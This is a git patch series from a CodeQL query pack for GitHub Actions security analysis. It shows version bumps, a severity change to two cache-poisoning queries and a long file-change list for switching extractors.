b/ql/lib/qlpack.yml index 48045dbf679..9e87409504d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.33 +version: 0.0.34 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2f79bddd77e..343bd9d6a22 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.33 +version: 0.0.34 groups: - actions - queries From c45d4d37aa46a5af27b9016a9cc6366d89838c5d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:34:42 +0200 Subject: [PATCH 0324/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9e87409504d..1999bd326a1 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.34 +version: 0.0.35 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 343bd9d6a22..bd34a5c9125 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.34 +version: 0.0.35 groups: - actions - queries From 3f0f75a7c5787eb6a4c7bd42a2ff85a2d8e0808f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:05:39 +0200 Subject: [PATCH 0325/1267] Make CachePoisoning queries high severity --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index a6dc7e14fdd..feef4316461 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -4,7 +4,7 @@ * @kind problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning * @tags actions * security diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql index 8fdebdbde18..030dd872cb2 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -4,7 +4,7 @@ * @kind path-problem * @problem.severity error * @precision high - * @security-severity 9.3 + * @security-severity 7.5 * @id actions/cache-poisoning/code-injection * @tags actions * security From 92cd50393b485895391a61aadc7ba2053d76ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 7 Jun 2024 10:06:46 +0200 Subject: [PATCH 0326/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1999bd326a1..5cfa47a5cdf 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.35 +version: 0.0.36 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index bd34a5c9125..65bb672183f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.35 +version: 0.0.36 groups: - actions - queries From ad1f35c86a7f7b957346747be585b5acf9431e05 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 3 Jun 2024 18:13:01 +0200 Subject: [PATCH 0327/1267] Move from yaml to js extractor --- .!79690!.DS_Store | 0 ql/lib/codeql-pack.lock.yml | 12 ++- .../codeql/actions/dataflow/ExternalFlow.qll | 18 ++--- .../internal/ExternalFlowExtensions.qll | 6 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ...rSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 2 +- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 2 +- .../aszc_change-string-case-action.model.yml | 2 +- ...ctions_configure-aws-credentials.model.yml | 2 +- .../axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 4 +- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 +- ql/lib/ext/changesets_action.model.yml | 2 +- .../ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 2 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 2 +- .../dawidd6_action-ansible-playbook.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 2 +- ...er-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 +- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- ...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- .../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 